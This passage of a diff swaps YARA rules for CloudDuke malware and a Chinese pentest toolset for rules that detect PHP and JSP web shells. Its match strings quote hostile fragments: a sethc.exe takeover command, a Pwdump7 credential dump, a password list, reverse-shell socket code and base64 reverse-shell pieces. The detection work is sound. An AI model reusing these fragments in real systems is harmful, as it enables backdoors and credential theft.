-		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "f2fa878de03732fbf5c86d656467ff50"
+		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$a1 = "barcod" fullword ascii
-		$s0 = "msports.dll" fullword ascii
-		$s1 = "nddeapi.dll" fullword ascii
-		$s2 = "glmf32.dll" fullword ascii
-		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
-		$s4 = "cmutil.dll" fullword ascii
-		$s5 = "mprapi.dll" fullword ascii
-		$s6 = "glmf32.dll" fullword ascii
+		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $a1 in ( 0 .. 4000 ) and all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Cloudduke_Malware : FILE
+rule SIGNATURE_BASE_Webshell_2008_2009Lite_2009Mssql
 {
 	meta:
-		description = "Detects CloudDuke Malware"
+		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "902ef68b-7ed1-5622-b796-4e3bb2388124"
-		date = "2015-07-22"
-		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudduke.yar#L10-L38"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2544-L2561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eaa159a99b6518db736adfd555bfcd052c2ae21b2e60a1db80b90459c47c90ab"
-		score = 60
+		logic_hash = "ae33048856440e25972aa5483b60e775f50f60a9ef5e77a58edd60eacdcd9ee3"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
-		hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
-		hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
-		hash4 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
-		hash5 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
-		hash6 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
-		hash7 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
 
 	strings:
-		$s1 = "ProcDataWrap" fullword ascii
-		$s2 = "imagehlp.dll" fullword ascii
-		$s3 = "dnlibsh" fullword ascii
-		$s4 = "%ws_out%ws" fullword wide
-		$s5 = "Akernel32.dll" fullword wide
-		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
-		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
-		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
+		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 720KB and 4 of ( $s* ) and 1 of ( $op* )
+		all of them
 }
-rule SIGNATURE_BASE_SFXRAR_Acrotray : FILE
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_Arabicspy_PHPSPY_Hkrkoz
 {
 	meta:
-		description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1566fb75-d3a8-5e22-b05b-3a2f37374f31"
-		date = "2015-07-22"
-		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudduke.yar#L42-L61"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2562-L2583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b318ab2854eb7614dd1a42d3971a96d1d485d5cce552336ad3a7f39886ba710"
+		logic_hash = "5da06481cf789e71969a5b54a33bfab41e08a1961cc056604a696203fef48422"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
-		hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
-		hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "0712e3dc262b4e1f98ed25760b206836"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s1 = "winrarsfxmappingfile.tmp" fullword wide
-		$s2 = "GETPASSWORD1" fullword wide
-		$s3 = "acrotray.exe" fullword ascii
-		$s4 = "CryptUnprotectMemory failed" fullword wide
+		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2449KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Mafix_Root : FILE
+rule SIGNATURE_BASE_Webshell_807_Dm_Jspspyjdk5_M_Cofigrue
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file root"
+		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae08b2e9-4d81-5f15-88d2-e2ace20626bf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L8-L24"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2584-L2603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "826778ef9c22177d41698b467586604e001fed19"
-		logic_hash = "db54561ba4b9c1bd4d9b183658b98f6fd3165b05c8d6d7f006ae3b5fc96ba549"
+		logic_hash = "0fc7ac740e147bd3703dac74743b19148aa7bb359cc5f347acf3b0dbe26bf752"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash2 = "341298482cf90febebb8616426080d1d"
+		hash3 = "88fc87e7c58249a398efd5ceae636073"
+		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
 
 	strings:
-		$s0 = "echo \"# vbox (voice box) getty\" >> /tmp/.init1" fullword ascii
-		$s1 = "cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog" fullword ascii
-		$s2 = "if [ -f /sbin/xlogin ]; then" fullword ascii
+		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
 
 	condition:
-		filesize < 96KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Passwd_Dict_3389 : FILE
+rule SIGNATURE_BASE_Webshell_Dive_Shell_1_0_Emperor_Hacking_Team_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.txt"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9418f0e5-7bf0-5df3-8857-dea90fae5a54"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L26-L46"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2604-L2621"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2897e909e48a9f56ce762244c3a3e9319e12362f"
-		logic_hash = "2be79fc7388ca12f06577e689944bcfa72ed1e1b6da5a7fa15c8da69a4555a9a"
+		logic_hash = "8bf11041a16060fa32431adfe33727863355bae7fec2cf841dcc919092db5c80"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+		hash1 = "f8a6d5306fb37414c5c772315a27832f"
+		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
 
 	strings:
-		$s0 = "654321" fullword ascii
-		$s1 = "admin123" fullword ascii
-		$s2 = "admin123456" fullword ascii
-		$s3 = "administrator" fullword ascii
-		$s4 = "passwd" fullword ascii
-		$s5 = "password" fullword ascii
-		$s7 = "12345678" fullword ascii
+		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Perl_Serv_U : FILE
+rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L48-L63"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2622-L2644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
-		logic_hash = "deb4ee54f9127bc093f96f7dbf3633fbfc3f66358c76fb15928dabbbffdd4963"
+		logic_hash = "171b811c1b93f99f3070692a91a0462f80d9d52ecf26d7fb7297a8bdd9a4c014"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "4b4c12b3002fad88ca6346a873855209"
+		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash8 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii
-		$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii
+		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
 
 	condition:
-		filesize < 8KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Reverse_Jsp_Reverse_Jspbd
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
+		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L65-L81"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2645-L2663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
-		logic_hash = "be4817bcaae952eb13c35dd89606ec733c682b2e197054bb348c3934012bd105"
-		score = 70
+		logic_hash = "cd7409bb6ace3044f3d0bf380133c4fe4a7c0c0309f9d800b397439aa95f81fc"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
 
 	strings:
-		$s0 = "PassWord:F4ckTeam!@#" fullword ascii
-		$s1 = "UserName:F4ck" fullword ascii
-		$s2 = "F4ck Team" fullword ascii
+		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389 : FILE
+rule SIGNATURE_BASE_Webshell_400_In_Jfolder_Jfolder01_Jsp_Leo_Warn_Webshell_Nc
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.vbs"
+		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d385820-befe-5e2b-8c48-ad90564d5f42"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L83-L97"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2664-L2688"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f92b74f41a2138cc05c6b6993bcc86c706017e49"
-		logic_hash = "32603edd3f188a9f4919795df04112883d7b88da46b13fcd0b0e0065fd4c016b"
+		logic_hash = "74e31e51f2cb46a042e8591ffb44fe68fb591d202c8171c6afb556eddb381f6f"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "36331f2c81bad763528d0ae00edf55be"
+		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash2 = "8979594423b68489024447474d113894"
+		hash3 = "ec482fc969d182e5440521c913bab9bd"
+		hash4 = "f98d2b33cd777e160d1489afed96de39"
+		hash5 = "4b4c12b3002fad88ca6346a873855209"
+		hash6 = "e9a5280f77537e23da2545306f6a19ad"
+		hash7 = "598eef7544935cf2139d1eada4375bb5"
 
 	strings:
-		$s1 = "success = obj.run(\"cmd /c takeown /f %SystemRoot%\\system32\\sethc.exe&echo y| " ascii
+		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
 
 	condition:
-		filesize < 10KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_2 : FILE
+rule SIGNATURE_BASE_Webshell_2_520_Job_Jspwebshell_1_2_Ma1_Ma4_2
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f449f632-3102-5e62-b790-5546698dd663"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L99-L114"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2689-L2711"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5ff92f39ade12f8ba6cb75dfdc9bb907e49f0ebd"
-		logic_hash = "637b3368fac624ca78d2f573b8b937b6b265426d7ed923f3a3d06039663c97ad"
+		logic_hash = "49614b2a42210fa134f85fa52c66e12809f2bb9eaf56c17b69d21e5fbfc8888b"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s1 = "@del c:\\termsrvhack.dll" fullword ascii
-		$s2 = "@del c:\\3389.txt" fullword ascii
+		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
 
 	condition:
-		filesize < 3KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Injection_Transit_Jmcook : FILE
+rule SIGNATURE_BASE_Webshell_Shell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L116-L131"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2712-L2736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
-		logic_hash = "f7a9aca65b92d4b9c787d83a421b54a23844fa8e061c6c627ddde8ab5b7f4396"
-		score = 70
-		quality = 83
-		tags = "FILE"
+		logic_hash = "140af92ab61059649a872bef96b916f2c402fd9891301d4a1ba1f389a45af003"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash4 = "40a1f840111996ff7200d18968e42cfe"
+		hash5 = "e0202adff532b28ef1ba206cf95962f2"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s1 = ".Open \"POST\",PostUrl,False" fullword ascii
-		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
+		$fn = "filename: backup"
 
 	condition:
-		filesize < 9KB and all of them
+		2 of ( $s* ) and not $fn
 }
-rule SIGNATURE_BASE_CN_Honker_Pwdump7_Pwdump7 : FILE
+rule SIGNATURE_BASE_Webshell_Gfs_Sh_R57Shell_R57Shell127_Sniper_SA_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Pwdump7.bat"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "baf6ced6-4298-5453-a020-a384c923584c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L133-L147"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2737-L2762"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "67d0e215c96370dcdc681bb2638703c2eeea188a"
-		logic_hash = "50e4ec9716b4e9d824fb301bb493dcdcd9782d87c0fb8040b82a87faf56292cb"
+		logic_hash = "24d93f9ae5e174873a32abdf8dca6c00f03cbb4c5e2ad531ac7fa34f8fc90794"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+		hash1 = "ef43fef943e9df90ddb6257950b3538f"
+		hash2 = "ae025c886fbe7f9ed159f49593674832"
+		hash3 = "911195a9b7c010f61b66439d9048f400"
+		hash4 = "697dae78c040150daff7db751fc0c03c"
+		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash9 = "41af6fd253648885c7ad2ed524e0692d"
+		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "Pwdump7.exe >pass.txt" fullword ascii
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Portrecall_Pr : FILE
+rule SIGNATURE_BASE_Webshell_Itsec_Phpjackal_Itsecteam_Shell_Jhn
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file pr"
+		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e137ed0-3af6-5b01-a27b-87bf42359887"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L149-L165"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2763-L2782"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "583cf6dc2304121d835f2879803a22fea76930f3"
-		logic_hash = "f33373e87887506651b1fac464f860a3cf18ad681ba124b606524f6f2255e693"
+		logic_hash = "0c97731c28f59a6fbab2b7882fae171da8d71add73ec92ab6093dec57fcd7207"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "e2830d3286001d1455479849aacbbb38"
+		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s1 = "Usage: Same as lcx.exe in win32 :)" fullword ascii
-		$s2 = "connect to client" fullword ascii
-		$s3 = "PR(Packet redirection) for linux " fullword ascii
+		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
 
 	condition:
-		filesize < 70KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_3 : FILE
